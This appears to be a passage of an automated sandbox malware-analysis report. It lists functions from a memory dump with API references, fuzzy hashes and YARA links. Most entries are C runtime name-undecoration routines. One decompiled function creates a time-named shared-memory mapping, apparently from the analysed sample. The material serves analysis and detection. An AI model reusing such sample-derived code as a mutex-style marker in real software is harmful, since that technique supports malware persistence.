Function 6E19E490, Relevance: 24.2, APIs: 16, Instructions: 187COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E19E4CE
operator+.LIBVCRUNTIMED ref: 6E19E543

Part of subcall function 6E199790: DName::operator+.LIBCMTD ref: 6E1997B0

DName::DName.LIBVCRUNTIMED ref: 6E19E534

Part of subcall function 6E1992D0: __aullrem.LIBCMT ref: 6E199317
Part of subcall function 6E1992D0: __aulldiv.LIBCMT ref: 6E199330

DName::DName.LIBVCRUNTIMED ref: 6E19E57C
Mailbox.LIBCMTD ref: 6E19E591
DName::DName.LIBVCRUNTIMED ref: 6E19E5FA
operator+.LIBVCRUNTIMED ref: 6E19E609
DName::DName.LIBVCRUNTIMED ref: 6E19E621
Mailbox.LIBCMTD ref: 6E19E636

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: NameName::$Mailboxoperator+$Name::operator+__aulldiv__aullrem
String ID:
API String ID: 2030757049-0
Opcode ID: 9db36080e54d774ff4ae7990fb98eccfc9c5510410619abcada0ffc67a97fc20
Instruction ID: fabe150c5bc031a7cae715e15cdde10112b644df0f259d46ab7ca08e3e9bf2b4
Opcode Fuzzy Hash: 9db36080e54d774ff4ae7990fb98eccfc9c5510410619abcada0ffc67a97fc20
Instruction Fuzzy Hash: 24715570D05508EFCB04DFE5D9A0AEEBBF9BF49304F108559E525AB250D730AA81EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1C50, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A1C5D
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A1CC3
Mailbox.LIBCMTD ref: 6E1A1CFE
Mailbox.LIBCMTD ref: 6E1A1E10
Mailbox.LIBCMTD ref: 6E1A1E27
Replicator::isFull.LIBCMTD ref: 6E1A1E40
Replicator::operator+=.LIBCMTD ref: 6E1A1E53
DName::isEmpty.LIBCMTD ref: 6E1A1E5B
DName::operator+=.LIBCMTD ref: 6E1A1E71
DName::isValid.LIBCMTD ref: 6E1A1EB0
DName::DName.LIBVCRUNTIMED ref: 6E1A1EBE
Mailbox.LIBCMTD ref: 6E1A1EDB

Strings

6, xrefs: 6E1A1D4F

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Mailbox$Iterator_baseIterator_base::_Name::isstd::_$EmptyFullNameName::Name::operator+=Replicator::isReplicator::operator+=Valid
String ID: 6
API String ID: 2413373717-498629140
Opcode ID: 920d6fd50f590281099ca96ac00e0e70dca19293de96f3c2b8a7f0a4a958cdc5
Instruction ID: 29227f63d6650a5921814b18f09f09e673e1eb72b751ec0f47e175f5dc6ad47f
Opcode Fuzzy Hash: 920d6fd50f590281099ca96ac00e0e70dca19293de96f3c2b8a7f0a4a958cdc5
Instruction Fuzzy Hash: DC7126B4A04554CFCB06DBF8C8A4BFEBBB6BF12304F04459DD66167280D7709988EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DA0A0, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

<program name unknown>, xrefs: 6E1DA17D

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID:
String ID: <program name unknown>
API String ID: 0-554726554
Opcode ID: c3f3a7fa7d2cddf26f9fbc5c19d31a429a850e4427a18379c8df69033d879b1a
Instruction ID: bd40d456001e855dd4d7ee195e0d1a2719a9f68a390503796d5f818b2750e3a8
Opcode Fuzzy Hash: c3f3a7fa7d2cddf26f9fbc5c19d31a429a850e4427a18379c8df69033d879b1a
Instruction Fuzzy Hash: 2F4124B6E4420CF7DB04EAE89C12FDE77AA5B50309F144514F7147E3C2EA719B449A92

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1570, Relevance: 19.6, APIs: 13, Instructions: 111COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A1579
Mailbox.LIBCMTD ref: 6E1A1592
Mailbox.LIBCMTD ref: 6E1A1608
DName::DName.LIBVCRUNTIMED ref: 6E1A1675

Part of subcall function 6E199110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E19916E

DName::operator+.LIBCMTD ref: 6E1A1688
DName::operator+.LIBCMTD ref: 6E1A15FF

Part of subcall function 6E199860: Mailbox.LIBCMTD ref: 6E199870
Part of subcall function 6E199860: Mailbox.LIBCMTD ref: 6E199888

DName::operator+.LIBCMTD ref: 6E1A15EC

Part of subcall function 6E199820: Mailbox.LIBCMTD ref: 6E199830
Part of subcall function 6E199820: Mailbox.LIBCMTD ref: 6E199848

DName::operator=.LIBVCRUNTIMED ref: 6E1A163C
DName::isEmpty.LIBCMTD ref: 6E1A1646
DName::operator=.LIBVCRUNTIMED ref: 6E1A1654

Part of subcall function 6E1A0FE0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A0FEC
Part of subcall function 6E1A0FE0: Mailbox.LIBCMTD ref: 6E1A1044

DName::operator+.LIBCMTD ref: 6E1A169B
Mailbox.LIBCMTD ref: 6E1A16A4
Mailbox.LIBCMTD ref: 6E1A16B0

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Mailbox$Name::operator+$Iterator_baseIterator_base::_NameName::operator=std::_$EmptyName::Name::isNode::makeStatus
String ID:
API String ID: 2733737839-0
Opcode ID: e20cc13034527b8d4afaeaf155469a2751b8a0eac88da1550403dd5b7301690f
Instruction ID: 6801ec9adb6137a313113756b5e39bec0f784660f5bd85e80746b13999e229f4
Opcode Fuzzy Hash: e20cc13034527b8d4afaeaf155469a2751b8a0eac88da1550403dd5b7301690f
Instruction Fuzzy Hash: 67418EB5E001089FCB05DFE4D8A1AFE7BBDAF41304F144569E216AB180EB702A84EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E19C260, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 155COMMON

Download Yara Rule

APIs

UnDecorator::doEllipsis.LIBCMTD ref: 6E19C294
UnDecorator::getArgumentList.LIBCMTD ref: 6E19C343

Part of subcall function 6E19C110: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19C120
Part of subcall function 6E19C110: DName::operator+=.LIBCMTD ref: 6E19C16C
Part of subcall function 6E19C110: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19C1D1
Part of subcall function 6E19C110: Replicator::isFull.LIBCMTD ref: 6E19C1F7
Part of subcall function 6E19C110: Replicator::operator+=.LIBCMTD ref: 6E19C20A
Part of subcall function 6E19C110: DName::operator=.LIBVCRUNTIMED ref: 6E19C22B
Part of subcall function 6E19C110: DName::operator+=.LIBCMTD ref: 6E19C237
Part of subcall function 6E19C110: Mailbox.LIBCMTD ref: 6E19C24A

Mailbox.LIBCMTD ref: 6E19C388
UnDecorator::doEllipsis.LIBCMTD ref: 6E19C3A4
DName::operator+.LIBCMTD ref: 6E19C40E
Mailbox.LIBCMTD ref: 6E19C417
Mailbox.LIBCMTD ref: 6E19C435
DName::DName.LIBVCRUNTIMED ref: 6E19C444

Part of subcall function 6E199110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E19916E

Mailbox.LIBCMTD ref: 6E19C457

Strings

Z, xrefs: 6E19C27A
Z, xrefs: 6E19C376

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Mailbox$Decorator::doEllipsisIterator_baseIterator_base::_NameName::operator+=std::_$ArgumentDecorator::getFullListName::Name::operator+Name::operator=Node::makeReplicator::isReplicator::operator+=Status
String ID: Z$Z
API String ID: 3869916097-3829148472
Opcode ID: 562b3ac35d681c6e5a1cf64e7d5d3ce9d9b259748378350fbdab57f859114b52
Instruction ID: 9ce933df37e7eabf4f334f7955c70e1df79b2e274cc56e75b82c7b90b6e832c7
Opcode Fuzzy Hash: 562b3ac35d681c6e5a1cf64e7d5d3ce9d9b259748378350fbdab57f859114b52
Instruction Fuzzy Hash: A4615C70D01208EFDB05DFE9D890ADDBBF5BF49304F108569E558AB354E7706A80EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19E7B0, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 171COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMTD ref: 6E19E7F2

Part of subcall function 6E199920: Mailbox.LIBCMTD ref: 6E199930
Part of subcall function 6E199920: DName::operator+=.LIBCMTD ref: 6E19993C
Part of subcall function 6E199920: Mailbox.LIBCMTD ref: 6E199948

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19E802
UnDecorator::doEcsu.LIBCMTD ref: 6E19E815
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19E854

Strings

W, xrefs: 6E19E9AF

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Iterator_baseIterator_base::_Mailboxstd::_$Decorator::doEcsuName::operator+Name::operator+=
String ID: W
API String ID: 4208403871-655174618
Opcode ID: 728484476c7a9dc927bd5ad8ef9f1d9abc9a0d30721992c5d082cd1a967827ef
Instruction ID: 80851113c7aa406c8cfa45be6184dbe650347c38c565eccc24b068e77dd4c4de
Opcode Fuzzy Hash: 728484476c7a9dc927bd5ad8ef9f1d9abc9a0d30721992c5d082cd1a967827ef
Instruction Fuzzy Hash: 58615EB1C00108EFDB05DFE4D890ADEBBF9BF15308F14456AE516AB254EB315A84EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E161352, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6E161352(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6E162130();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6e164144;
				_push(_t15 + 0x6e16505e);
				_push(_t15 + 0x6e165054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6E16212A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t34 = CreateFileMappingW(0xffffffff, 0x6e164148, 4, 0, _t18,  &_v60);
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6e161352
0x6e16135b
0x6e16135f
0x6e161365
0x6e16136a
0x6e16136f
0x6e161372
0x6e161375
0x6e16137a
0x6e16137b
0x6e16137e
0x6e161389
0x6e161390
0x6e161394
0x6e161396
0x6e161397
0x6e16139a
0x6e16139f
0x6e1613a9
0x6e1613ab
0x6e1613ab
0x6e1613c5
0x6e1613c9
0x6e161419
0x6e1613cb
0x6e1613d4
0x6e1613ea
0x6e1613f2
0x6e161404
0x6e161408
0x00000000
0x00000000
0x6e1613f4
0x6e1613f7
0x6e1613fc
0x6e1613fe
0x6e1613fe
0x6e1613df
0x6e1613e1
0x6e16140a
0x6e16140b
0x6e16140b
0x6e1613d4
0x6e161421

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 6E16135F
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E161375
_snwprintf.NTDLL ref: 6E16139A
CreateFileMappingW.KERNEL32(000000FF,6E164148,00000004,00000000,?,?), ref: 6E1613BF
GetLastError.KERNEL32 ref: 6E1613D6
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6E1613EA
GetLastError.KERNEL32 ref: 6E161402
CloseHandle.KERNEL32(00000000), ref: 6E16140B
GetLastError.KERNEL32 ref: 6E161413

Strings

`RxtAxt, xrefs: 6E16135F

Memory Dump Source

Source File: 00000000.00000002.590714125.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.590570797.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.590742972.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.590764017.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.590805088.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: `RxtAxt
API String ID: 1724014008-1376811538
Opcode ID: 8d83fc20a07711724560874916922bda01ff70de000e93ee62c550fa877a2f7c
Instruction ID: efaaf002ef18e627430f84d0d49082e9fc89fd78a12df9071aef3d14f9305c5d
Opcode Fuzzy Hash: 8d83fc20a07711724560874916922bda01ff70de000e93ee62c550fa877a2f7c
Instruction Fuzzy Hash: BA21A4B2600108BFDB41DFE4CC88EEE7779EB95355F218035F619D7180D730999AAB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A40B0, Relevance: 16.6, APIs: 11, Instructions: 117COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A40B9
operator+.LIBVCRUNTIMED ref: 6E1A4127

Part of subcall function 6E199790: DName::operator+.LIBCMTD ref: 6E1997B0

Mailbox.LIBCMTD ref: 6E1A4133
UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E1A4116

Part of subcall function 6E19E050: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E19E07B
Part of subcall function 6E19E050: Mailbox.LIBCMTD ref: 6E19E0C6

Mailbox.LIBCMTD ref: 6E1A4172
UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E1A41A9
Mailbox.LIBCMTD ref: 6E1A41B5
DName::operator=.LIBVCRUNTIMED ref: 6E1A4202
Mailbox.LIBCMTD ref: 6E1A4225

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Mailbox$DecoratedDecorator::getName$Iterator_baseIterator_base::_Name::operator+Name::operator=operator+std::_
String ID:
API String ID: 1608807181-0
Opcode ID: e20bd42d91de01246076c80c29e2c29803fb4c33755daa0548343a5652b30e6b
Instruction ID: c92e357012c87b053bd512e474f61d4b8844fe784d39f1392627c9335a34e32b
Opcode Fuzzy Hash: e20bd42d91de01246076c80c29e2c29803fb4c33755daa0548343a5652b30e6b
Instruction Fuzzy Hash: 1E414AB5900504DFE705DBE4E8F0BFE3BBAAB52304F04056AD52247684EF706AC6EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5D40, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 299COMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,?,00000000,?,6E1A6D52,?,?,?,?,?,?,?,6E1D0DE4,00000002,?,00000000), ref: 6E1A5D80
__invoke_watson_if_error.LIBCMTD ref: 6E1A5E23

Strings

@, xrefs: 6E1A5E4C
@, xrefs: 6E1A5EEF

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: HandleModule__invoke_watson_if_error
String ID: @$@
API String ID: 3976807648-149943524
Opcode ID: 3ccb672b0e5e06dc44ed1fe3f43bcf84ebe2f94750d6045ddbca94084e850b84
Instruction ID: 760ca32cca4684ccb0ebfe4fbf1b3dd7d508bc312329898d12d6ee6bcba78ee6
Opcode Fuzzy Hash: 3ccb672b0e5e06dc44ed1fe3f43bcf84ebe2f94750d6045ddbca94084e850b84
Instruction Fuzzy Hash: 9DD179B895422DEBDB24DFD8CC49BEAB776AB54304F1041D9E6086B280D3749BC4DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5850, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 296COMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,?,00000000,?,6E1A6D22,?,?,?,?,?,?,?,6E1D042F,00000002,?,00000000), ref: 6E1A5890
__invoke_watson_if_error.LIBCMTD ref: 6E1A5933

Strings

@, xrefs: 6E1A595C
@, xrefs: 6E1A59F0

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: HandleModule__invoke_watson_if_error
String ID: @$@
API String ID: 3976807648-149943524
Opcode ID: 7eb49ddb76a96ea6052a370255cb60ae9f2b97b52033eba5ba955ca902a3306b
Instruction ID: a027559b33b9207277f0b97354bded43210652f6f6229fdb00b6cee422d925cb
Opcode Fuzzy Hash: 7eb49ddb76a96ea6052a370255cb60ae9f2b97b52033eba5ba955ca902a3306b
Instruction Fuzzy Hash: 52D15CB4904229DFDB24CF98CC89BEEB776AB69704F1044D9E7096B280D7705AC4DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A0980, Relevance: 15.2, APIs: 10, Instructions: 203COMMON

Download Yara Rule

APIs

DName::isEmpty.LIBCMTD ref: 6E1A09C0
operator+.LIBVCRUNTIMED ref: 6E1A0A13
DName::isEmpty.LIBCMTD ref: 6E1A0AD2
operator+.LIBVCRUNTIMED ref: 6E1A0C17

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: EmptyName::isoperator+
String ID:
API String ID: 1193048883-0
Opcode ID: 05d03316129eb316ed8b921b71311de30188eef5051969aa1bc8e72a01115cf7
Instruction ID: 4d71e57eb32710439bf1bf988eb26f607164f65636f4f2574aa12944f85e8f32
Opcode Fuzzy Hash: 05d03316129eb316ed8b921b71311de30188eef5051969aa1bc8e72a01115cf7
Instruction Fuzzy Hash: 7271BB75900504EFCB05DFD8D9A0AEE7BB9AF45304F108569F6199B285FB709A80EBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E197960, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 153COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIMED ref: 6E19796A

Part of subcall function 6E1985C0: __guard_icall_checks_enforced.LIBCMTD ref: 6E1985C6

___vcrt_getptd.LIBVCRUNTIMED ref: 6E197972
__FrameHandler3::isEHs.LIBVCRUNTIMED ref: 6E1979AA
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIMED ref: 6E1979F4
_Smanip.LIBCPMTD ref: 6E197A0F
__FrameHandler3::isNoExcept.LIBVCRUNTIMED ref: 6E197A5E

Strings

csm, xrefs: 6E197980
csm, xrefs: 6E197A74

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Frame$Handler3::is$EmptyExceptHandler3::SmanipStateUnwind___except_validate_context_record___vcrt_getptd__guard_icall_checks_enforced
String ID: csm$csm
API String ID: 2671830719-3733052814
Opcode ID: 550995e9a9f1dd3b3a466c31f1843f9f778e6330a00a1089aebad378464ee8f0
Instruction ID: 6b1b17848456ece354b84a728ad44d91d2f6239c6d0a6f410dd7a55492784f54
Opcode Fuzzy Hash: 550995e9a9f1dd3b3a466c31f1843f9f778e6330a00a1089aebad378464ee8f0
Instruction Fuzzy Hash: 75514DB5A04109ABDB04CFD4D891EEF77B9AF58348F148519F90A8B280D734EA91EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1976E0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

___vcrt_getptd.LIBVCRUNTIMED ref: 6E1976F7
___vcrt_getptd.LIBVCRUNTIMED ref: 6E197702

Strings

MOC, xrefs: 6E19771B
RCC, xrefs: 6E197726

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: ___vcrt_getptd
String ID: MOC$RCC
API String ID: 984050374-2084237596
Opcode ID: f1e9a66609e8aed6f777036c6d297fddcd955a55f85439bd348ecd303540d648
Instruction ID: f54786721bce34e2fb93a59f3a085bad67e03d43bcba5a1cb5fc6809ca2133e6
Opcode Fuzzy Hash: f1e9a66609e8aed6f777036c6d297fddcd955a55f85439bd348ecd303540d648
Instruction Fuzzy Hash: 4B510175900109EBDB04CFD8C990EEE73B9AF58304F64855AE915A72D0E734ED81EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E19EED0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E19EEF4

Part of subcall function 6E199110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E19916E

DName::DName.LIBVCRUNTIMED ref: 6E19EF49

Strings

A, xrefs: 6E19EFDB

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name$Name::$Node::makeStatus
String ID: A
API String ID: 3739413223-3554254475
Opcode ID: 54079bbbe0802c7b1107faa8c0516124c9ed66b7edfa51e7268be6d0979858b5
Instruction ID: a2635b9a237f86c3426b6e9a9bff2733c05239cb8405293b2ab8c80f25e36504
Opcode Fuzzy Hash: 54079bbbe0802c7b1107faa8c0516124c9ed66b7edfa51e7268be6d0979858b5
Instruction Fuzzy Hash: E151CFB0904508EFCB04DFE8D8909EEBBBABF59304F148559F4599B244DB30AA85EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1F50, Relevance: 13.6, APIs: 9, Instructions: 124COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E1A1F8C
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A2003
Mailbox.LIBCMTD ref: 6E1A203F
Mailbox.LIBCMTD ref: 6E1A205A
DName::isEmpty.LIBCMTD ref: 6E1A2062
DName::operator+=.LIBCMTD ref: 6E1A207F
DName::operator+=.LIBCMTD ref: 6E1A20AE
DName::operator+=.LIBCMTD ref: 6E1A20B8
Mailbox.LIBCMTD ref: 6E1A2101

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: MailboxName::operator+=$EmptyIterator_baseIterator_base::_NameName::Name::isstd::_
String ID:
API String ID: 3761117093-0
Opcode ID: ed1f6f3a1349ab08ac89de1f42c4d51397d1fa7ecc86cb963e4ef3b93a2d5360
Instruction ID: 0eb8e1dedc2bbab2c5f41e4c26601c5d42f2611a5002b2d2acc8a572ef043b79
Opcode Fuzzy Hash: ed1f6f3a1349ab08ac89de1f42c4d51397d1fa7ecc86cb963e4ef3b93a2d5360
Instruction Fuzzy Hash: CA51D874D01514DFCB05DFA4D8A4BFE777AFB11304F108659D525972C0DB715A84EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A0C30, Relevance: 13.6, APIs: 9, Instructions: 124COMMON

Download Yara Rule

APIs

DName::isEmpty.LIBCMTD ref: 6E1A0C95
DName::isEmpty.LIBCMTD ref: 6E1A0CA1
DName::isEmpty.LIBCMTD ref: 6E1A0CC5
DName::DName.LIBVCRUNTIMED ref: 6E1A0D44
DName::isEmpty.LIBCMTD ref: 6E1A0D58
DName::isEmpty.LIBCMTD ref: 6E1A0D70
DName::isEmpty.LIBCMTD ref: 6E1A0D7C
DName::operator+=.LIBCMTD ref: 6E1A0D8A
Mailbox.LIBCMTD ref: 6E1A0DA2

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: EmptyName::is$MailboxNameName::Name::operator+=
String ID:
API String ID: 2270187897-0
Opcode ID: 6a520e50fa74bd119f44896328ee69485532f533c25285929caa104784e839f8
Instruction ID: c43dcef559621d95c9858426b51818e28c2045eb5f4331c9d7e0302481f301f0
Opcode Fuzzy Hash: 6a520e50fa74bd119f44896328ee69485532f533c25285929caa104784e839f8
Instruction Fuzzy Hash: 87418075A10109EBCB04DFD8D9A09FE73B9AF54304F508558EA169B294FB30EE84EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E19DF10, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E19DF1D

Part of subcall function 6E199060: pDNameNode::pDNameNode.LIBCMTD ref: 6E19909A

operator+.LIBVCRUNTIMED ref: 6E19DF52
DName::isEmpty.LIBCMTD ref: 6E19DF74

Part of subcall function 6E1A04F0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A04F9

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19DFEA
Mailbox.LIBCMTD ref: 6E19E006

Strings

X, xrefs: 6E19DF3D

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name$Iterator_baseIterator_base::_std::_$EmptyMailboxName::Name::isNodeNode::poperator+
String ID: X
API String ID: 3628514644-3081909835
Opcode ID: da957de84f3bec753b49f7191db05fdbb9e074c6b9a186c983c1e394092aacdf
Instruction ID: d357ad58c69d5cb9ad703d9ee22aa0270aab28ae58c036d58c25730ceb7366d5
Opcode Fuzzy Hash: da957de84f3bec753b49f7191db05fdbb9e074c6b9a186c983c1e394092aacdf
Instruction Fuzzy Hash: 95318475D00108FFCB05DFE4D891AEE7BB9AF45708F148159E6146B280FB71AB84EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E02E0, Relevance: 12.1, APIs: 8, Instructions: 141timememoryCOMMON

Download Yara Rule

APIs

__wcstombs_l.LIBCMTD ref: 6E1E0399
__MarkAllocaS.LIBCMTD ref: 6E1E03A2

Part of subcall function 6E1D81B0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 6E1D81E3

std::_Timevec::_Timevec.LIBCPMTD ref: 6E1E03BD
std::_Timevec::_Timevec.LIBCPMTD ref: 6E1E03C8
std::_Mutex::_Lock.LIBCPMTD ref: 6E1E03E3
std::_Mutex::_Lock.LIBCPMTD ref: 6E1E0447
GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,00000000), ref: 6E1E046E
std::_Mutex::_Lock.LIBCPMTD ref: 6E1E047A

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$LockMutex::_$TimevecTimevec::_$AllocaByteCharMarkMultiStringTypeWide__wcstombs_l
String ID:
API String ID: 2378836076-0
Opcode ID: 65b3831edd3417d70d6033abad9e46310888269c4ce0eb00909b44c404c4fc0c
Instruction ID: caf1c33d81b9323129e6bca3674db06c3eac88f1d4afaa7d5c577a4bb6d6ec1f
Opcode Fuzzy Hash: 65b3831edd3417d70d6033abad9e46310888269c4ce0eb00909b44c404c4fc0c
Instruction Fuzzy Hash: 59514C74910609EFDB04DFD8C891BEEB7B8BF54308F504558F51167281EB74AE85EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A0DD0, Relevance: 12.1, APIs: 8, Instructions: 127COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A0E5B
UnDecorator::doMSKeywords.LIBCMTD ref: 6E1A0E60
DName::operator+=.LIBCMTD ref: 6E1A0E72

Part of subcall function 6E199AD0: DName::isValid.LIBCMTD ref: 6E199ADC
Part of subcall function 6E199AD0: DName::isEmpty.LIBCMTD ref: 6E199AF0

Part of subcall function 6E199E20: UnDecorator::doUnderScore.LIBCMTD ref: 6E199E26

Part of subcall function 6E199990: DName::isValid.LIBCMTD ref: 6E19999C
Part of subcall function 6E199990: DName::isEmpty.LIBCMTD ref: 6E1999B1

DName::DName.LIBVCRUNTIMED ref: 6E1A0F0A

Part of subcall function 6E199990: DName::append.LIBCMTD ref: 6E199A14

DName::operator+=.LIBCMTD ref: 6E1A0F4C
Mailbox.LIBCMTD ref: 6E1A0F58
DName::DName.LIBVCRUNTIMED ref: 6E1A0F69
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A0F78

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name::is$Decorator::doEmptyIterator_baseIterator_base::_NameName::Name::operator+=Validstd::_$KeywordsMailboxName::appendScoreUnder
String ID:
API String ID: 4042095736-0
Opcode ID: 0b344a4b600ec6b1ea15e6280b0efdbf058ac95da701dc74be61993fbbf92d91
Instruction ID: ec6903b9a2dc008d6f2a1cda2a98f782d5d8df8a8923e7f879800e694616b1fc
Opcode Fuzzy Hash: 0b344a4b600ec6b1ea15e6280b0efdbf058ac95da701dc74be61993fbbf92d91
Instruction Fuzzy Hash: ED51C574D00109EFCB05DFE8C8A1AFEBBB5BF45304F108569E6157B294EB706A84EB91

Uniqueness

Uniqueness Score: -1.00%

